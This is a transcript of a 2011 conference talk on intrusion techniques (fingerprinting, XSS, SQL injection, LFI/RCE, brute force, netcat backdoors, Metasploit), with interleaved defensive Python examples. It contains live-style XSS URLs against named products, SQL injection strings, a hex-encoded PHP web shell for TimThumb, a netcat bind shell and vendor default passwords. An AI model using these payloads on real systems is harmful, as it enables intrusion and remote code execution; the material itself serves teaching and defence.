"Intrusion Techniques (Open Source Tools)" by Ewerson Guimarães
    Presentation Transcript

    • Intrusion Techniques – DcLabs Hacking Tour 2011. Ewerson Guimarães (Crash), DcLabs – HackingTour 2011
    • Agenda: Fingerprinting, Web bugs, Backdoors, Brute force, Shellcode, Exploits, Scanners
    • FingerPrint: grab information about a target host. It is used to identify the operating system and/or service (daemon) version number from the unique characteristics of TCP/IP responses. The best tool for discovering operating systems, services, devices and more is NMAP (Network Mapper). Basic commands:
      nmap host (basic scan)
      nmap -sV host (service versions)
      nmap -P0 host (ignore ICMP echo-reply)
      nmap -O host (try to grab the OS version)
      nmap -f host (firewall/IDS/IPS evasion)
    • Passive FingerPrint: an OS can be identified without sending it any packet, from fields it sets on its own outbound traffic:
      • TTL: the Time To Live value the operating system sets on outbound packets
      • Window Size: the TCP window size the operating system starts with
      • DF: whether the operating system sets the Don't Fragment bit
      • TOS: whether the operating system sets the Type of Service, and if so, to what value
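Passive fingerprinting as a defender sees it on a network tap: the four fields above are pulled straight out of raw IPv4/TCP header bytes and compared with a signature table. This is an added example, not code from the talk; the signature values are constructed for illustration and are not a real p0f or nmap database, and `build_packet` only fabricates sample headers so the check can run offline.

```python
import struct
from typing import Optional

# Constructed, illustrative signatures (not a real fingerprint database):
# initial TTL, initial TCP window, DF bit set, TOS byte -> OS family guess.
SIGNATURES = [
    {"ttl": 64,  "window": 29200, "df": True,  "tos": 0x00, "os": "Linux (2.6+)"},
    {"ttl": 128, "window": 8192,  "df": True,  "tos": 0x00, "os": "Windows"},
    {"ttl": 255, "window": 4128,  "df": False, "tos": 0x00, "os": "Cisco IOS"},
]

def extract_features(packet: bytes) -> dict:
    """Pull TTL, TOS, DF and the TCP window out of a raw IPv4 + TCP packet."""
    if len(packet) < 40:
        raise ValueError("packet too short for IPv4 + TCP headers")
    ver_ihl, tos, _tlen, _ident, flags_frag, ttl, proto = struct.unpack("!BBHHHBB", packet[:10])
    if ver_ihl >> 4 != 4 or proto != 6:
        raise ValueError("not an IPv4/TCP packet")
    ihl = (ver_ihl & 0x0F) * 4          # IP header length in bytes (options included)
    df = bool(flags_frag & 0x4000)      # DF is bit 14 of the flags/fragment field
    # TCP header layout: sport(2) dport(2) seq(4) ack(4) offset(1) flags(1) window(2)
    window = struct.unpack("!H", packet[ihl + 14:ihl + 16])[0]
    return {"ttl": ttl, "tos": tos, "df": df, "window": window}

def initial_ttl(observed: int) -> int:
    """Each router hop decrements TTL, so round up to the nearest common initial value."""
    for candidate in (32, 64, 128, 255):
        if observed <= candidate:
            return candidate
    return 255

def guess_os(packet: bytes) -> Optional[str]:
    """Return the OS family whose signature matches the packet, or None if nothing matches."""
    f = extract_features(packet)
    key = (initial_ttl(f["ttl"]), f["window"], f["df"], f["tos"])
    for sig in SIGNATURES:
        if (sig["ttl"], sig["window"], sig["df"], sig["tos"]) == key:
            return sig["os"]
    return None

def build_packet(ttl: int, tos: int, df: bool, window: int) -> bytes:
    """Constructed sample: minimal IPv4 header + TCP SYN header carrying the given fields."""
    flags_frag = 0x4000 if df else 0
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, tos, 40, 0, flags_frag, ttl, 6, 0,
                     b"\x0a\x00\x00\x01", b"\x0a\x00\x00\x02")
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 0, 0, 5 << 4, 0x02, window, 0, 0)
    return ip + tcp
```

A packet that has crossed three hops still matches, because `initial_ttl` rounds 61 back up to 64; a window size the table does not know yields `None` rather than a wrong guess.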
    • FingerPrint Matrix:
    • FingerPrint – U. Bourne
    • FingerPrint: in BackTrack Linux you can find many tools for fingerprinting: http://www.backtrack-linux.com
    • Web Vulnerability: these vulnerabilities are initially exploited through malicious browser requests, compromising the target in a matter of minutes. Cross-Site Scripting (XSS) – Reflected / Stored; SQL Injection; PHP (LFI / RFI / AFU / RCE)
    • Web Vulnerability – Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users.
      Spekx – Knowledge Base: http://server/pls/ksp_acesso.login_script?p_time=%221%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
      LMS Web Ensino – TOTVS: http://site/lms/sistema/webensino/index.php?modo=resbusca_biblioteca&pChave=a%22%2F%3E+%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&Submit=Buscar
    • Web Vulnerability – Reflected / Stored XSS DEMO
    • Web Vulnerability
    • What is the impact? Why? Examples?
    • Web VulnerabilitySQL-InjectionIt occurs when the attacker can insert a series of SQL statementswithin a query by manipulating the data entry application.SELECT campos FROM tabela WHERE campo = test@test.com;Inject string: some OR x=xSELECT fields FROM table WHERE field = ‘some OR x=x;admin-- " or 0=0 # or 1=1-- hi or a=a or 0=0 -- or 0=0 # " or 1=1-- hi) or (a=a" or 0=0 -- or x=x or 1=1-- hi") or ("a"="aor 0=0 -- " or "x"="x or a=a-- ‘);Drop table x;-- or 0=0 # ) or (x=x hi" or 1=1 -- ) or (a=aEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • SQL Injection LIVE DEMO – OCOMON: throwing fudge at the fan
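The `or x=x` family above works because the input becomes part of the SQL text. The following added example (not code from the talk or from OCOMON) builds a constructed SQLite table standing in for the slide's `tabela`, runs the same lookup once by string concatenation and once with a bound parameter, and shows that the injection strings only change the result of the concatenated version.

```python
import sqlite3

def setup_db() -> sqlite3.Connection:
    """Constructed sample table: three users, one of them an admin."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (email, role) VALUES (?, ?)", [
        ("test@test.com", "user"),
        ("admin@example.com", "admin"),
        ("bob@example.com", "user"),
    ])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, email: str) -> list:
    """The slide's pattern: the untrusted value is glued into the statement text."""
    query = "SELECT email, role FROM users WHERE email = '" + email + "'"
    return conn.execute(query).fetchall()

def lookup_safe(conn: sqlite3.Connection, email: str) -> list:
    """Parameterised query: the value is bound as data and cannot alter the statement."""
    return conn.execute("SELECT email, role FROM users WHERE email = ?", (email,)).fetchall()

# Constructed test inputs in the style of the slide's list.
TAUTOLOGY = "x' OR 'x'='x"          # closes the literal, makes the WHERE always true
COMMENT_OUT = "admin@example.com'-- " # closes the literal, comments out the trailing quote
```

With `TAUTOLOGY` the concatenated query becomes `... WHERE email = 'x' OR 'x'='x'` and returns every row, while the parameterised version looks for a literal e-mail address containing quotes and returns nothing.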
    • Web Vulnerability – CGI/PHP Command Injection: it occurs when the attacker inserts a series of commands by exploiting vulnerable CGI/PHP scripts.
      OneorZero – AFU + LFI: http://server/oneorzero/index.php?controller=../[FILE].php
      WordPress TimThumb (theme) plugin – RCE (payload bytes as hex): x47x49x46x38x39x61x01x00x01x00x80x00x00 xFFxFFxFFx00x00x00x21xF9x04x01x00x00x00 x00x2Cx00x00x00x00x01x00x01x00x00x02x02 x44x01x00x3Bx00x3Cx3Fx70x68x70x20x40x65 x76x61x6Cx28x24x5Fx47x45x54x5Bx27x63x6D x64x27x5Dx29x3Bx20x3Fx3Ex00
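Both bugs on this slide come from trusting a name or a file the client supplied. As an added example (not code from the talk, TimThumb or OneorZero), the check below rejects an image upload whose bytes start with a valid GIF header but also carry a PHP open tag, and resolves a `?controller=` parameter through an allowlist so that `../` can never reach the filesystem. The GIF bytes are the same minimal 1x1 image as the slide's hex; the appended PHP block is a harmless constructed `echo`, and the controller allowlist and base directory are assumptions.

```python
import os
import re
from typing import Optional

GIF_MAGIC = (b"GIF87a", b"GIF89a")
# PHP open tags and the <script language="php"> form; binary image data can contain
# "<?" by chance, so a production fix should also re-encode the image with an image library.
PHP_TAGS = re.compile(rb"<\?(?:php\b|=)|<script\b[^>]*\bphp\b", re.IGNORECASE)

def looks_like_gif(data: bytes) -> bool:
    return data[:6] in GIF_MAGIC

def has_php_tag(data: bytes) -> bool:
    return PHP_TAGS.search(data) is not None

def validate_upload(data: bytes) -> str:
    """Return 'ok' or the reason the upload is rejected: magic bytes first, then PHP markers."""
    if not looks_like_gif(data):
        return "rejected: not a GIF"
    if has_php_tag(data):
        return "rejected: PHP code embedded in image"
    return "ok"

# Constructed samples: the slide's 1x1 GIF, clean and with a trailing PHP block.
CLEAN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
             b"\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00"
             b"\x00\x02\x02\x44\x01\x00\x3b")
POLYGLOT_GIF = CLEAN_GIF + b"\x00<?php echo 'marker'; ?>"

# Assumed allowlist of controller names for the include-by-parameter pattern.
CONTROLLERS = {"index", "login", "search"}

def resolve_controller(name: str, base_dir: str = "/var/www/app/controllers") -> Optional[str]:
    """Map a client-supplied controller name to a file path only if it is on the allowlist."""
    if name not in CONTROLLERS:
        return None
    return os.path.join(base_dir, name + ".php")
```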
    • Default/Weak passwords: default passwords are set by the manufacturers/developers and were not changed after installation/configuration. They are supplied by the system vendor and meant to be changed at installation time (nobody does this shit). Ex: 3Com switch: user security, pass security; FireBird: user sysdba, pass masterkey. Weak: passwords that are easily guessed or follow a keyboard sequence. Ex: 123456, Love, home phone number, birthday, etc.
    • Brute Force: it consists of trying random combinations of characters, numbers and symbols, wordlists and/or string generators to crack a password. Ex: John the Ripper, Hydra, SSH brute force
    • Brute Force – DirBuster: DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers
    • Exploits – kinds of exploits:
      Local: usually the objective of a local exploit is to elevate the user's privileges on the machine as close as possible to root (uid=0) or administrator. They are written to exploit kernel bugs or suid binaries.
      Remote: works over a network connection and exploits the vulnerable target without any prior access to it. www.securityfocus.com, www.secunia.com, www.exploit-db.com
      0-days: usually an unpublished exploit for a brand new vulnerability. You can buy! $$$$$
    • Exploits: if the kernel was patched, will we cry? Alexos =>
    • Exploits: No!!!! Fuck him!!! We have other ways to pwn the box: GNU C library dynamic linker, suid binaries, etc.
    • Backdoors/RootKits: used to maintain access to the system. We can use Netcat for this purpose:
      nc -vv -l -p 5555
      nc -vv -l -p 5555 -e /bin/bash
      nc <ip> <port>
      RootKits: the main purpose of a rootkit is to hide the attacker's presence by replacing vital system binaries on the target system. Examples: hide files (matching given strings), run a command when a string matches, hide processes, hide open ports, and others.
    • Scanners/FuzzersThere are 2 types of scanners: Specific which are written fora specific vulnerability (BSQLHacker, SQLMAP) and Genericwhich are written for various kinds of vulnerabilities. Genericscanners use known service banners/strings to locate thepotential target/vulnerabilities W3af NessusEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Scanners/Fuzzers
    • SniffersSniffer monitors and analyzes network traffic. Some of thesepackets may contain critical information (such as logins,passwords and cool infos )WhireShark -Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • MetaSploit
    • MetaSploit – Let's fuck Windows?
    • Hardening your server: HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files, giving you a quick overview of the security status of your system.
    • Questions?
    • Contact: Crash - crash@dclabs.com.br; IRC: irc.freenode.net #dclabs; twitter: @crashbrz